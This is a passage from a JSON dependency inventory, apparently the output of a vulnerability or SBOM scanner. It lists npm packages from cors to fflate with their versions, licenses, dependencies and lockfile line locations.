"cors@2.8.6", "Name": "cors", "Identifier": { "PURL": "pkg:npm/cors@2.8.6", "UID": "7438c9e56be412ab" }, "Version": "2.8.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "object-assign@4.1.1", "vary@1.1.2" ], "Locations": [ { "StartLine": 4224, "EndLine": 4240 } ], "AnalyzedBy": "npm" }, { "ID": "cross-fetch@3.2.0", "Name": "cross-fetch", "Identifier": { "PURL": "pkg:npm/cross-fetch@3.2.0", "UID": "c4a7db2bdab9da9e" }, "Version": "3.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "node-fetch@2.7.0" ], "Locations": [ { "StartLine": 4248, "EndLine": 4256 } ], "AnalyzedBy": "npm" }, { "ID": "cross-spawn@7.0.6", "Name": "cross-spawn", "Identifier": { "PURL": "pkg:npm/cross-spawn@7.0.6", "UID": "3e995dd95c2e6121" }, "Version": "7.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "path-key@3.1.1", "shebang-command@2.0.0", "which@2.0.2" ], "Locations": [ { "StartLine": 4257, "EndLine": 4270 } ], "AnalyzedBy": "npm" }, { "ID": "crypto-js@4.2.0", "Name": "crypto-js", "Identifier": { "PURL": "pkg:npm/crypto-js@4.2.0", "UID": "d9e16402827a644b" }, "Version": "4.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4271, "EndLine": 4276 } ], "AnalyzedBy": "npm" }, { "ID": "cssesc@3.0.0", "Name": "cssesc", "Identifier": { "PURL": "pkg:npm/cssesc@3.0.0", "UID": "e56f53ee90afa116" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4277, "EndLine": 4288 } ], "AnalyzedBy": "npm" }, { "ID": "csstype@3.2.3", "Name": "csstype", "Identifier": { "PURL": "pkg:npm/csstype@3.2.3", "UID": "4898864191c3de45" }, "Version": "3.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4289, "EndLine": 4294 } ], "AnalyzedBy": "npm" }, { "ID": "d3-array@3.2.4", "Name": "d3-array", "Identifier": { "PURL": "pkg:npm/d3-array@3.2.4", "UID": "72d6d360076fa8b8" }, "Version": "3.2.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "internmap@2.0.3" ], "Locations": [ { "StartLine": 4295, "EndLine": 4306 } ], "AnalyzedBy": "npm" }, { "ID": "d3-color@3.1.0", "Name": "d3-color", "Identifier": { "PURL": "pkg:npm/d3-color@3.1.0", "UID": "8820c51a30866026" }, "Version": "3.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4307, "EndLine": 4315 } ], "AnalyzedBy": "npm" }, { "ID": "d3-ease@3.0.1", "Name": "d3-ease", "Identifier": { "PURL": "pkg:npm/d3-ease@3.0.1", "UID": "547e28baa63d47f9" }, "Version": "3.0.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4316, "EndLine": 4324 } ], "AnalyzedBy": "npm" }, { "ID": "d3-format@3.1.2", "Name": "d3-format", "Identifier": { "PURL": "pkg:npm/d3-format@3.1.2", "UID": "157b0878803187d7" }, "Version": "3.1.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4325, "EndLine": 4333 } ], "AnalyzedBy": "npm" }, { "ID": "d3-interpolate@3.0.1", "Name": "d3-interpolate", "Identifier": { "PURL": "pkg:npm/d3-interpolate@3.0.1", "UID": "645fae9aed7e1429" }, "Version": "3.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "d3-color@3.1.0" ], "Locations": [ { "StartLine": 4334, "EndLine": 4345 } ], "AnalyzedBy": "npm" }, { "ID": "d3-path@3.1.0", "Name": "d3-path", "Identifier": { "PURL": "pkg:npm/d3-path@3.1.0", "UID": "2f2147e7deeab9bd" }, "Version": "3.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4346, "EndLine": 4354 } ], "AnalyzedBy": "npm" }, { "ID": "d3-scale@4.0.2", "Name": "d3-scale", "Identifier": { "PURL": "pkg:npm/d3-scale@4.0.2", "UID": "731b0e1b7b306a72" }, "Version": "4.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "d3-array@3.2.4", "d3-format@3.1.2", "d3-interpolate@3.0.1", "d3-time-format@4.1.0", "d3-time@3.1.0" ], "Locations": [ { "StartLine": 4355, "EndLine": 4370 } ], "AnalyzedBy": "npm" }, { "ID": "d3-shape@3.2.0", "Name": "d3-shape", "Identifier": { "PURL": "pkg:npm/d3-shape@3.2.0", "UID": "ecf7fcc3ec5d094e" }, "Version": "3.2.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "d3-path@3.1.0" ], "Locations": [ { "StartLine": 4371, "EndLine": 4382 } ], "AnalyzedBy": "npm" }, { "ID": "d3-time@3.1.0", "Name": "d3-time", "Identifier": { "PURL": "pkg:npm/d3-time@3.1.0", "UID": "98f1ac5e86b433b1" }, "Version": "3.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "d3-array@3.2.4" ], "Locations": [ { "StartLine": 4383, "EndLine": 4394 } ], "AnalyzedBy": "npm" }, { "ID": "d3-time-format@4.1.0", "Name": "d3-time-format", "Identifier": { "PURL": "pkg:npm/d3-time-format@4.1.0", "UID": "b46a8cfc90597852" }, "Version": "4.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "d3-time@3.1.0" ], "Locations": [ { "StartLine": 4395, "EndLine": 4406 } ], "AnalyzedBy": "npm" }, { "ID": "d3-timer@3.0.1", "Name": "d3-timer", "Identifier": { "PURL": "pkg:npm/d3-timer@3.0.1", "UID": "1822aabe50289c6e" }, "Version": "3.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4407, "EndLine": 4415 } ], "AnalyzedBy": "npm" }, { "ID": "dayjs@1.11.20", "Name": "dayjs", "Identifier": { "PURL": "pkg:npm/dayjs@1.11.20", "UID": "11faa6b4064d7e1b" }, "Version": "1.11.20", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4416, "EndLine": 4421 } ], "AnalyzedBy": "npm" }, { "ID": "debug@2.6.9", "Name": "debug", "Identifier": { "PURL": "pkg:npm/debug@2.6.9", "UID": "2a62687bdb44aadd" }, "Version": "2.6.9", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ms@2.0.0" ], "Locations": [ { "StartLine": 3700, "EndLine": 3708 }, { "StartLine": 5274, "EndLine": 5282 }, { "StartLine": 5477, "EndLine": 5485 }, { "StartLine": 7133, "EndLine": 7141 }, { "StartLine": 8828, "EndLine": 8836 } ], "AnalyzedBy": "npm" }, { "ID": "debug@4.4.3", "Name": "debug", "Identifier": { "PURL": "pkg:npm/debug@4.4.3", "UID": "eeb962d623a91114" }, "Version": "4.4.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ms@2.1.3" ], "Locations": [ { "StartLine": 4422, "EndLine": 4438 } ], "AnalyzedBy": "npm" }, { "ID": "decamelize@1.2.0", "Name": "decamelize", "Identifier": { "PURL": "pkg:npm/decamelize@1.2.0", "UID": "8d8eb0e430561291" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4439, "EndLine": 4447 } ], "AnalyzedBy": "npm" }, { "ID": "decimal.js-light@2.5.1", "Name": "decimal.js-light", "Identifier": { "PURL": "pkg:npm/decimal.js-light@2.5.1", "UID": "48d749d4ec631c7d" }, "Version": "2.5.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4448, "EndLine": 4453 } ], "AnalyzedBy": "npm" }, { "ID": "deepmerge@4.3.1", "Name": "deepmerge", "Identifier": { "PURL": "pkg:npm/deepmerge@4.3.1", "UID": "1ea0fc6772831144" }, "Version": "4.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4474, "EndLine": 4482 } ], "AnalyzedBy": "npm" }, { "ID": "delayed-stream@1.0.0", "Name": "delayed-stream", "Identifier": { "PURL": "pkg:npm/delayed-stream@1.0.0", "UID": "8d1ac8f51eba9454" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4483, "EndLine": 4491 } ], "AnalyzedBy": "npm" }, { "ID": "denque@2.1.0", "Name": "denque", "Identifier": { "PURL": "pkg:npm/denque@2.1.0", "UID": "8a8ffafa5c393a66" }, "Version": "2.1.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4492, "EndLine": 4500 } ], "AnalyzedBy": "npm" }, { "ID": "depd@2.0.0", "Name": "depd", "Identifier": { "PURL": "pkg:npm/depd@2.0.0", "UID": "d019fee3d093740e" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4501, "EndLine": 4509 } ], "AnalyzedBy": "npm" }, { "ID": "destroy@1.2.0", "Name": "destroy", "Identifier": { "PURL": "pkg:npm/destroy@1.2.0", "UID": "4fa54c20c478abef" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4510, "EndLine": 4519 } ], "AnalyzedBy": "npm" }, { "ID": "detect-libc@2.1.2", "Name": "detect-libc", "Identifier": { "PURL": "pkg:npm/detect-libc@2.1.2", "UID": "14592211267c9f49" }, "Version": "2.1.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4520, "EndLine": 4528 } ], "AnalyzedBy": "npm" }, { "ID": "dfa@1.2.0", "Name": "dfa", "Identifier": { "PURL": "pkg:npm/dfa@1.2.0", "UID": "197b83c0e692235" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4540, "EndLine": 4545 } ], "AnalyzedBy": "npm" }, { "ID": "didyoumean@1.2.2", "Name": "didyoumean", "Identifier": { "PURL": "pkg:npm/didyoumean@1.2.2", "UID": "af0fffe32ba5a055" }, "Version": "1.2.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4546, "EndLine": 4551 } ], "AnalyzedBy": "npm" }, { "ID": "dijkstrajs@1.0.3", "Name": "dijkstrajs", "Identifier": { "PURL": "pkg:npm/dijkstrajs@1.0.3", "UID": "5356e4c4f9eeed18" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4572, "EndLine": 4577 } ], "AnalyzedBy": "npm" }, { "ID": "dlv@1.1.3", "Name": "dlv", "Identifier": { "PURL": "pkg:npm/dlv@1.1.3", "UID": "515b067cc4ac9f8e" }, "Version": "1.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4578, "EndLine": 4583 } ], "AnalyzedBy": "npm" }, { "ID": "dom-helpers@5.2.1", "Name": "dom-helpers", "Identifier": { "PURL": "pkg:npm/dom-helpers@5.2.1", "UID": "42b97c48d2ade526" }, "Version": "5.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "csstype@3.2.3" ], "Locations": [ { "StartLine": 4597, "EndLine": 4606 } ], "AnalyzedBy": "npm" }, { "ID": "dom-serializer@2.0.0", "Name": "dom-serializer", "Identifier": { "PURL": "pkg:npm/dom-serializer@2.0.0", "UID": "d1ab23907f7e3d97" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "domelementtype@2.3.0", "domhandler@5.0.3", "entities@4.5.0" ], "Locations": [ { "StartLine": 4607, "EndLine": 4620 } ], "AnalyzedBy": "npm" }, { "ID": "domelementtype@2.3.0", "Name": "domelementtype", "Identifier": { "PURL": "pkg:npm/domelementtype@2.3.0", "UID": "40a1b6a7799af732" }, "Version": "2.3.0", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4621, "EndLine": 4632 } ], "AnalyzedBy": "npm" }, { "ID": "domhandler@5.0.3", "Name": "domhandler", "Identifier": { "PURL": "pkg:npm/domhandler@5.0.3", "UID": "614fa134847d9dbc" }, "Version": "5.0.3", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "domelementtype@2.3.0" ], "Locations": [ { "StartLine": 4633, "EndLine": 4647 } ], "AnalyzedBy": "npm" }, { "ID": "domutils@3.2.2", "Name": "domutils", "Identifier": { "PURL": "pkg:npm/domutils@3.2.2", "UID": "8c808e0657fdad81" }, "Version": "3.2.2", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "dom-serializer@2.0.0", "domelementtype@2.3.0", "domhandler@5.0.3" ], "Locations": [ { "StartLine": 4648, "EndLine": 4661 } ], "AnalyzedBy": "npm" }, { "ID": "dunder-proto@1.0.1", "Name": "dunder-proto", "Identifier": { "PURL": "pkg:npm/dunder-proto@1.0.1", "UID": "7c574d08024d363b" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bind-apply-helpers@1.0.2", "es-errors@1.3.0", "gopd@1.2.0" ], "Locations": [ { "StartLine": 4662, "EndLine": 4675 } ], "AnalyzedBy": "npm" }, { "ID": "duplexify@4.1.3", "Name": "duplexify", "Identifier": { "PURL": "pkg:npm/duplexify@4.1.3", "UID": "76441d675fad4843" }, "Version": "4.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "end-of-stream@1.4.5", "inherits@2.0.4", "readable-stream@3.6.2", "stream-shift@1.0.3" ], "Locations": [ { "StartLine": 4676, "EndLine": 4688 } ], "AnalyzedBy": "npm" }, { "ID": "eastasianwidth@0.2.0", "Name": "eastasianwidth", "Identifier": { "PURL": "pkg:npm/eastasianwidth@0.2.0", "UID": "2793f147a9fa1748" }, "Version": "0.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4699, "EndLine": 4704 } ], "AnalyzedBy": "npm" }, { "ID": "ecdsa-sig-formatter@1.0.11", "Name": "ecdsa-sig-formatter", "Identifier": { "PURL": "pkg:npm/ecdsa-sig-formatter@1.0.11", "UID": "13ce6f930aa73e1e" }, "Version": "1.0.11", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "safe-buffer@5.2.1" ], "Locations": [ { "StartLine": 4705, "EndLine": 4713 } ], "AnalyzedBy": "npm" }, { "ID": "editorconfig@1.0.7", "Name": "editorconfig", "Identifier": { "PURL": "pkg:npm/editorconfig@1.0.7", "UID": "62cc93df94233ce7" }, "Version": "1.0.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@one-ini/wasm@0.1.1", "commander@10.0.1", "minimatch@9.0.9", "semver@7.7.4" ], "Locations": [ { "StartLine": 4714, "EndLine": 4731 } ], "AnalyzedBy": "npm" }, { "ID": "ee-first@1.1.1", "Name": "ee-first", "Identifier": { "PURL": "pkg:npm/ee-first@1.1.1", "UID": "ce9ae72d691b523d" }, "Version": "1.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4756, "EndLine": 4761 } ], "AnalyzedBy": "npm" }, { "ID": "electron-to-chromium@1.5.345", "Name": "electron-to-chromium", "Identifier": { "PURL": "pkg:npm/electron-to-chromium@1.5.345", "UID": "3bc12a0909bbff1a" }, "Version": "1.5.345", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4762, "EndLine": 4767 } ], "AnalyzedBy": "npm" }, { "ID": "emoji-regex@10.6.0", "Name": "emoji-regex", "Identifier": { "PURL": "pkg:npm/emoji-regex@10.6.0", "UID": "7c5282d972139dd4" }, "Version": "10.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4768, "EndLine": 4773 } ], "AnalyzedBy": "npm" }, { "ID": "emoji-regex@8.0.0", "Name": "emoji-regex", "Identifier": { "PURL": "pkg:npm/emoji-regex@8.0.0", "UID": "1d0d5b0536cf9a80" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9224, "EndLine": 9229 }, { "StartLine": 9230, "EndLine": 9235 } ], "AnalyzedBy": "npm" }, { "ID": "emoji-regex@9.2.2", "Name": "emoji-regex", "Identifier": { "PURL": "pkg:npm/emoji-regex@9.2.2", "UID": "409ba11369001fde" }, "Version": "9.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1459, "EndLine": 1464 } ], "AnalyzedBy": "npm" }, { "ID": "encodeurl@2.0.0", "Name": "encodeurl", "Identifier": { "PURL": "pkg:npm/encodeurl@2.0.0", "UID": "928cd91b6a9d2a8b" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4774, "EndLine": 4782 } ], "AnalyzedBy": "npm" }, { "ID": "end-of-stream@1.4.5", "Name": "end-of-stream", "Identifier": { "PURL": "pkg:npm/end-of-stream@1.4.5", "UID": "f58bba7f72b7410e" }, "Version": "1.4.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "once@1.4.0" ], "Locations": [ { "StartLine": 4783, "EndLine": 4792 } ], "AnalyzedBy": "npm" }, { "ID": "engine.io@6.6.7", "Name": "engine.io", "Identifier": { "PURL": "pkg:npm/engine.io@6.6.7", "UID": "a84cd399b8a210eb" }, "Version": "6.6.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/cors@2.8.19", "@types/node@20.19.39", "@types/ws@8.18.1", "accepts@1.3.8", "base64id@2.0.0", "cookie@0.7.2", "cors@2.8.6", "debug@4.4.3", "engine.io-parser@5.2.3", "ws@8.18.3" ], "Locations": [ { "StartLine": 4793, "EndLine": 4813 } ], "AnalyzedBy": "npm" }, { "ID": "engine.io-client@6.6.4", "Name": "engine.io-client", "Identifier": { "PURL": "pkg:npm/engine.io-client@6.6.4", "UID": "fa32925863d057f7" }, "Version": "6.6.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@socket.io/component-emitter@3.1.2", "debug@4.4.3", "engine.io-parser@5.2.3", "ws@8.18.3", "xmlhttprequest-ssl@2.1.2" ], "Locations": [ { "StartLine": 4814, "EndLine": 4826 } ], "AnalyzedBy": "npm" }, { "ID": "engine.io-parser@5.2.3", "Name": "engine.io-parser", "Identifier": { "PURL": "pkg:npm/engine.io-parser@5.2.3", "UID": "d71aade2164c2724" }, "Version": "5.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4827, "EndLine": 4835 } ], "AnalyzedBy": "npm" }, { "ID": "entities@4.5.0", "Name": "entities", "Identifier": { "PURL": "pkg:npm/entities@4.5.0", "UID": "2ebb20f3fecafa9" }, "Version": "4.5.0", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4845, "EndLine": 4856 } ], "AnalyzedBy": "npm" }, { "ID": "es-define-property@1.0.1", "Name": "es-define-property", "Identifier": { "PURL": "pkg:npm/es-define-property@1.0.1", "UID": "ecb234adda087bc6" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4857, "EndLine": 4865 } ], "AnalyzedBy": "npm" }, { "ID": "es-errors@1.3.0", "Name": "es-errors", "Identifier": { "PURL": "pkg:npm/es-errors@1.3.0", "UID": "d1076850566adb94" }, "Version": "1.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4866, "EndLine": 4874 } ], "AnalyzedBy": "npm" }, { "ID": "es-object-atoms@1.1.1", "Name": "es-object-atoms", "Identifier": { "PURL": "pkg:npm/es-object-atoms@1.1.1", "UID": "c6a20059ea9a7b1f" }, "Version": "1.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-errors@1.3.0" ], "Locations": [ { "StartLine": 4875, "EndLine": 4886 } ], "AnalyzedBy": "npm" }, { "ID": "es-set-tostringtag@2.1.0", "Name": "es-set-tostringtag", "Identifier": { "PURL": "pkg:npm/es-set-tostringtag@2.1.0", "UID": "35cee62be8994c4e" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-errors@1.3.0", "get-intrinsic@1.3.0", "has-tostringtag@1.0.2", "hasown@2.0.3" ], "Locations": [ { "StartLine": 4887, "EndLine": 4901 } ], "AnalyzedBy": "npm" }, { "ID": "escalade@3.2.0", "Name": "escalade", "Identifier": { "PURL": "pkg:npm/escalade@3.2.0", "UID": "cd4f1e0ee5b5ba89" }, "Version": "3.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4941, "EndLine": 4949 } ], "AnalyzedBy": "npm" }, { "ID": "escape-html@1.0.3", "Name": "escape-html", "Identifier": { "PURL": "pkg:npm/escape-html@1.0.3", "UID": "2d4ccab25030e05f" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4950, "EndLine": 4955 } ], "AnalyzedBy": "npm" }, { "ID": "etag@1.8.1", "Name": "etag", "Identifier": { "PURL": "pkg:npm/etag@1.8.1", "UID": "b0992a177a119928" }, "Version": "1.8.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5130, "EndLine": 5138 } ], "AnalyzedBy": "npm" }, { "ID": "event-target-shim@5.0.1", "Name": "event-target-shim", "Identifier": { "PURL": "pkg:npm/event-target-shim@5.0.1", "UID": "7cf315c3ae823489" }, "Version": "5.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5139, "EndLine": 5148 } ], "AnalyzedBy": "npm" }, { "ID": "eventemitter3@4.0.7", "Name": "eventemitter3", "Identifier": { "PURL": "pkg:npm/eventemitter3@4.0.7", "UID": "f88f630827877e04" }, "Version": "4.0.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5149, "EndLine": 5154 } ], "AnalyzedBy": "npm" }, { "ID": "events@3.3.0", "Name": "events", "Identifier": { "PURL": "pkg:npm/events@3.3.0", "UID": "49746143ebe5d93d" }, "Version": "3.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5155, "EndLine": 5163 } ], "AnalyzedBy": "npm" }, { "ID": "express@4.22.1", "Name": "express", "Identifier": { "PURL": "pkg:npm/express@4.22.1", "UID": "61fd036c11c8cced" }, "Version": "4.22.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "accepts@1.3.8", "array-flatten@1.1.1", "body-parser@1.20.5", "content-disposition@0.5.4", "content-type@1.0.5", "cookie-signature@1.0.7", "cookie@0.7.2", "debug@2.6.9", "depd@2.0.0", "encodeurl@2.0.0", "escape-html@1.0.3", "etag@1.8.1", "finalhandler@1.3.2", "fresh@0.5.2", "http-errors@2.0.1", "merge-descriptors@1.0.3", "methods@1.1.2", "on-finished@2.4.1", "parseurl@1.3.3", "path-to-regexp@0.1.13", "proxy-addr@2.0.7", "qs@6.14.2", "range-parser@1.2.1", "safe-buffer@5.2.1", "send@0.19.2", "serve-static@1.16.3", "setprototypeof@1.2.0", "statuses@2.0.2", "type-is@1.6.18", "utils-merge@1.0.1", "vary@1.1.2" ], "Locations": [ { "StartLine": 5201, "EndLine": 5246 } ], "AnalyzedBy": "npm" }, { "ID": "express-rate-limit@8.5.1", "Name": "express-rate-limit", "Identifier": { "PURL": "pkg:npm/express-rate-limit@8.5.1", "UID": "c30567a47af6487e" }, "Version": "8.5.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "express@4.22.1", "ip-address@10.2.0" ], "Locations": [ { "StartLine": 5247, "EndLine": 5264 } ], "AnalyzedBy": "npm" }, { "ID": "extend@3.0.2", "Name": "extend", "Identifier": { "PURL": "pkg:npm/extend@3.0.2", "UID": "142f8d98c80b4758" }, "Version": "3.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5289, "EndLine": 5295 } ], "AnalyzedBy": "npm" }, { "ID": "farmhash-modern@1.1.0", "Name": "farmhash-modern", "Identifier": { "PURL": "pkg:npm/farmhash-modern@1.1.0", "UID": "580a4aa7878313c3" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5296, "EndLine": 5304 } ], "AnalyzedBy": "npm" }, { "ID": "fast-deep-equal@2.0.1", "Name": "fast-deep-equal", "Identifier": { "PURL": "pkg:npm/fast-deep-equal@2.0.1", "UID": "879b47ad6a034c58" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8405, "EndLine": 8410 } ], "AnalyzedBy": "npm" }, { "ID": "fast-deep-equal@3.1.3", "Name": "fast-deep-equal", "Identifier": { "PURL": "pkg:npm/fast-deep-equal@3.1.3", "UID": "7bf3e115d3e7f560" }, "Version": "3.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5305, "EndLine": 5310 } ], "AnalyzedBy": "npm" }, { "ID": "fast-equals@5.4.0", "Name": "fast-equals", "Identifier": { "PURL": "pkg:npm/fast-equals@5.4.0", "UID": "29294a65cde4caf0" }, "Version": "5.4.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5311, "EndLine": 5319 } ], "AnalyzedBy": "npm" }, { "ID": "fast-glob@3.3.3", "Name": "fast-glob", "Identifier": { "PURL": "pkg:npm/fast-glob@3.3.3", "UID": "34d4473cc0e7cab6" }, "Version": "3.3.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@nodelib/fs.stat@2.0.5", "@nodelib/fs.walk@1.2.8", "glob-parent@5.1.2", "merge2@1.4.1", "micromatch@4.0.8" ], "Locations": [ { "StartLine": 5320, "EndLine": 5335 } ], "AnalyzedBy": "npm" }, { "ID": "fast-xml-builder@1.1.5", "Name": "fast-xml-builder", "Identifier": { "PURL": "pkg:npm/fast-xml-builder@1.1.5", "UID": "e589910a79395ad7" }, "Version": "1.1.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "path-expression-matcher@1.5.0" ], "Locations": [ { "StartLine": 5369, "EndLine": 5384 } ], "AnalyzedBy": "npm" }, { "ID": "fast-xml-parser@5.7.2", "Name": "fast-xml-parser", "Identifier": { "PURL": "pkg:npm/fast-xml-parser@5.7.2", "UID": "9759f54cdf2cc117" }, "Version": "5.7.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@nodable/entities@2.1.0", "fast-xml-builder@1.1.5", "path-expression-matcher@1.5.0", "strnum@2.2.3" ], "Locations": [ { "StartLine": 5385, "EndLine": 5406 } ], "AnalyzedBy": "npm" }, { "ID": "fastq@1.20.1", "Name": "fastq", "Identifier": { "PURL": "pkg:npm/fastq@1.20.1", "UID": "fe676b5e175cf88d" }, "Version": "1.20.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "reusify@1.1.0" ], "Locations": [ { "StartLine": 5407, "EndLine": 5415 } ], "AnalyzedBy": "npm" }, { "ID": "faye-websocket@0.11.4", "Name": "faye-websocket", "Identifier": { "PURL": "pkg:npm/faye-websocket@0.11.4", "UID": "d02cc2f955b0263d" }, "Version": "0.11.4", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "websocket-driver@0.7.4" ], "Locations": [ { "StartLine": 5416, "EndLine": 5427 } ], "AnalyzedBy": "npm" }, { "ID": "fdir@6.5.0", "Name": "fdir", "Identifier": { "PURL": "pkg:npm/fdir@6.5.0", "UID": "502f8294095fca66" }, "Version": "6.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "picomatch@4.0.4" ], "Locations": [ { "StartLine": 9665, "EndLine": 9681 } ], "AnalyzedBy": "npm" }, { "ID": "fflate@0.8.2", "Name": "fflate", "Identifier": { "PURL": "pkg:npm/fflate@0.8.2", "UID": "61464d5ab3c111a8" }, "Version": "0.8.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5428, "EndLine": 5433 } ], 